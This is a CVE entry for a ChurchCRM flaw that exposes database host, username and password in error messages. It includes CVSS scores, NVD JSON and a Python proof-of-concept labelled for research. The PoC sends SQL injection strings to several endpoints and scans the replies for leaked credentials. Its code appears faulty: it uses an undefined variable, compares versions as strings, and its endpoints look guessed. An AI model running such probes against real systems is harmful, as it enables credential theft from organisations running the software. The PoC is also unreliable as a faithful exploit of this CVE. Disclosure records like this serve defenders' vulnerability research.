CVE-2025-68110

Description

ChurchCRM is an open-source church management system. Versions prior to 6.5.3 may disclose database information in an error message including the host, ip, username, and password. Version 6.5.3 fixes the issue.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE

ChurchCRM < 6.5.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-68110 PoC - ChurchCRM Database Information Disclosure
# This PoC demonstrates triggering error conditions to leak database credentials

import requests
import re
from urllib.parse import quote

TARGET_URL = "http://target-churchcrm.com/ChurchCRM"

def test_database_info_disclosure():
    """Test for database information disclosure vulnerability"""
    
    # Test endpoints that may trigger database errors
    test_endpoints = [
        "/FindIndividual.php?Search=1&AJAX_request=true",
        "/PersonEditor.php?PersonID=' OR 1=1 --",
        "/api/persons?search=test' AND SLEEP(5) --",
        "/FinancialReports.php?report=invalid",
    ]
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
    }
    
    print("[*] Testing ChurchCRM for database info disclosure...")
    
    for endpoint in test_endpoints:
        try:
            url = TARGET_URL + endpoint
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            
            # Search for database connection information in response
            db_info_patterns = [
                r'(mysql|postgresql|sqlite):[^\s]+',  # Database connection strings
                r'localhost[:\d]*',                     # Host information
                r'user[=:]\s*\w+',                      # Username hints
                r'password[=:]\s*\S+',                  # Password hints
                r'Database.*?error',
                r'SQLSTATE.*?\d+',
                r'MySQL.*?error',
                r'Connection.*?failed'
            ]
            
            for pattern in db_info_patterns:
                matches = re.findall(pattern, response.text, re.IGNORECASE)
                if matches:
                    print(f"[!] Potential database info found at {endpoint}:")
                    for match in matches:
                        print(f"    {match}")
                        
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")

def check_version():
    """Check if target is vulnerable version"""
    try:
        response = requests.get(TARGET_URL + "/SystemSettings.php", headers=headers, timeout=10)
        if "version" in response.text.lower():
            version_match = re.search(r'version[:\s]*([\d.]+)', response.text, re.IGNORECASE)
            if version_match:
                version = version_match.group(1)
                print(f"[*] Detected ChurchCRM version: {version}")
                if version < "6.5.3":
                    print("[!] Target is potentially vulnerable")
    except:
        pass

if __name__ == "__main__":
    test_database_info_disclosure()
    check_version()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68110
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68110
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68110/
[4] VulDB https://vuldb.com/cve/CVE-2025-68110
[5] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-82mq-xc2j-3qv2
[6] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-82mq-xc2j-3qv2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68110", "sourceIdentifier": "[email protected]", "published": "2025-12-17T22:16:00.913", "lastModified": "2025-12-18T18:29:30.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Versions prior to 6.5.3 may disclose database information in an error message including the host, ip, username, and password. Version 6.5.3 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-209"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.3", "matchCriteriaId": "5B1435CA-1370-4154-85E0-6AF1846DEEBD"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-82mq-xc2j-3qv2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-82mq-xc2j-3qv2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}